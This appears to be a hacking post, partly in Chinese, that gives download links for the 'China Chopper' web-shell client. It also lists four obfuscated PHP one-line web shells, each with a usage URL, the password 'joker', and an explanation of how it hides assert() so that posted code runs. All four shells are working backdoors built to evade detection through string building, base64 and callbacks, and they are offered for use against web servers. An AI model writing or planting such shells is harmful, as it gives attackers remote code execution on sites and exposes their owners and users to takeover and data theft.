Chinese kitchen knife download, based on the original Chinese kitchen knife optimized version 20160309.
download link:
http://pan.baidu.com/s/1jHoJxHW
China chopper
http://pan.baidu.com/s/1eRxEYjC
The following are various sentences collected and organized, with how to use them:
1.php
<?php $POST['POST']='assert'; $array[]=$POST; $array[0]['POST']($_POST['joker']); ?>
Usage: http://www.xxx.com/1.php
Kitchen knife connection usage: http://www.xxx.com/1.php
Password: joker
Detailed explanation: assert is a php code execution function, which has the same function as eval() . Give the $array array, in this case the output of $array[0]['POST'] is assert, so it forms a Trojan horse
assert($_POST['joker']), just use the kitchen knife to link directly
————————————————————————————————————————————————————————
2.php
<?php error_reporting(0); $g = array('','s'); $gg = a.$g[1].ser.chr('116'); @$gg($_POST[joker]); ?>
Usage: http://www.xxx.com/2.php
Kitchen knife connection usage: http://www.xxx.com/2.php
Password: joker
Detailed explanation: $ g is an array, $g[1]='s', chr('116')='t', (https://blog.csdn.net/yabingshi_tech/article/details/19833217 ASCll code correspondence table ), such that $gg=
assert, @$gg($_POST[joker]) is not assert($_POST[joker]), it is our common one-sentence Trojan horse, you can directly link to the kitchen knife
————————————————————————————————————————————————————————
3.php (array_filter+base64_decode)
<?php error_reporting(0); $e=$_REQUEST['e']; $arr=array($_POST['joker'],); array_filter($arr,base64_decode($e)); ?>
用法: http://www.xxx.com/3.php?e=YXNzZXJ0
浏览器提交POST:joker=phpinfo();
菜刀连接用法: http://www.xxx.com/3.php?e=YXNzZXJ0
密码:joker
详解:YXNzZXJ0的base64解码后的结果为assert,$e接受浏览器传过来的参数,$arr是个数组,array_filter()函数用回调函数过滤数组中的值,
,如果我们传入$e的参数为YXNzZXJ0,这样的话我们的回调函数名就是assert,并且要过滤数组中的每一个参数
就构成了assert($_POST['joker']),常见的一句话木马,直接用菜刀链接即可
——————————————————————————————————————————————————————————
4.php
<?php error_reporting(0); call_user_func('assert', $_REQUEST['joker']); ?>
用法: http://www.xxx.com/4.php
菜刀连接用法: http://www.xxx.com/4.php
密码:joker
详解:call_user_func()函数把第一个参数作为回调函数调用,也就是说assert是被调用的回调函数,其余参数是回调函数的参数。
这样的话就直接构成了 assert($_REQUEST['joker']) 这样的一句话木马,直接用菜刀链接即可